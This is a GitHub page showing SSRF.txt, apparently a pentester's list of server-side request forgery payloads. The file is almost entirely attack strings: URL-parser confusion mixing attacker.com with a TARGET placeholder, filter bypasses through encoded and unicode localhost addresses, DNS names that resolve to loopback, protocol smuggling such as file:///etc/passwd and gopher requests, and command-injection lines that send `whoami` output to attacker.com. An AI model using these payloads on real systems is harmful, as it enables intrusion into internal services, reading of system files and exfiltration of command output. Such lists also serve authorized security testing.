-
Notifications
You must be signed in to change notification settings - Fork 2
/
SSRF.txt
189 lines (165 loc) · 4.22 KB
/
SSRF.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
# TARGET = target domain
# attacker.com = attacker web site
# Domain Parser
https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
@attacker.com
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
https:attacker.com
# Bypass blacklist filter
attacker%00.com
attacker%E3%80%82com
attacker。com
# Domain Confusion
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
http://[email protected]
http://TARGET%[email protected]
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)[email protected]
http://attacker.com#TARGET
http://TARGET.attacker.com
http://attacker.com/TARGET
http://attacker.com/?d=TARGET
https://[email protected]
https://attacker.com#TARGET
https://TARGET.attacker.com
https://attacker.com/TARGET
https://attacker.com/?d=TARGET
http://[email protected]
http://attacker.com#TARGET
http://TARGET.attacker.com
http://attacker.com/TARGET
http://attacker.com/?d=TARGET
http://attacker.com%00TARGET
http://attacker.com?TARGET
http://attacker.com///TARGET
https://attacker.com%00TARGET
https://attacker.com%0ATARGET
https://attacker.com?TARGET
https://attacker.com///TARGET
https://attacker.com\TARGET/
https://attacker.com;https://TARGET
https://attacker.com\TARGET/
https://attacker.com\.TARGET
https://attacker.com/.TARGET
https://attacker.com\@@TARGET
https://attacker.com:\@@TARGET
https://attacker.com#\@TARGET
https://attacker.com\anything@TARGET/
# On each IP position try to put 1 attackers domain and the others the victim domain
# http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
http://attacker.com&@TARGET#@TARGET
http://TARGET&@attacker.com#@TARGET
http://TARGET&@TARGET#@attacker.com
http://attacker.com&@TARGET
http://TARGET&@attacker.com
http://attacker.com#@TARGET
http://TARGET#@attacker.com
http://attacker.com:80+&@TARGET#[email protected]
http://TARGET+&@attacker.com:80#[email protected]
http://attacker.com:80+&@attacker.com:80#+@TARGET
http://attacker.com+&@TARGET
http://TARGET+&@attacker.com
http://attacker.com#+@TARGET
http://TARGET#[email protected]
http://[email protected]
http://attacker.com?@TARGET
http://TARGET#@www.attacker.com
http://attacker.com#@TARGET
http://TARGET&attacker.com
http://attacker.com&TARGET
http://TARGET?.attacker.com
http://attacker.com?.TARGET
http://TARGET#.attacker.com
http://attacker.com#.TARGET
http://TARGET\.attacker.com/TARGET
http://TARGETattacker.com
http://////////////attacker.com/
https://192.10.10.2?.192.10.10.3/
https://192.10.10.2#.192.10.10.3/
https://192.10.10.2\.192.10.10.3/
# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://0
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/
http://①②⑦.⓪.⓪.⓪
127.0.0.1
127.0.1
127.1
127.000.000.001
2130706433
0x7F.0x00.0x00.0x01
0x7F.1
0x7F000001
# HTTP Parameter Pollution
redirect_uri=TARGET&redirect_uri=attacker.com
# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821
# Decimal bypass
http://2130706433/
http://3232235521/
http://3232235777/
# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001
# Hexadecimal bypass
0x7f 00 00 01
http://0x7f000001/
http://0xc0a80014/
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001
# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php
# Malformed and rare
+11211aaa
00011211aaaa
http://0/
http://127.1
http://127.0.1
# DNS to localhost
localtest.me
TARGET.127.0.0.1.nip.io
mail.ebc.apple.com
127.0.0.1.nip.io
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us
http://customer1.app.localhost.my.company.1.1.1.1.nip.io
http://bugbounty.dod.network
1ynrnhl.xip.io
spoofed.burpcollaborator.net
# Protocols
file:///etc/passwd
dict://attacker.com
sftp://TARGET
tftp://TARGET
ldap://localhost//%0astats%0aquit
gopher://attacker.com:8080/_GET / HTTP/1.0%0A%0A
# RCE
http://attacker.com?`whoami`
`whoami`.attacker.com
$(whoami).attacker.com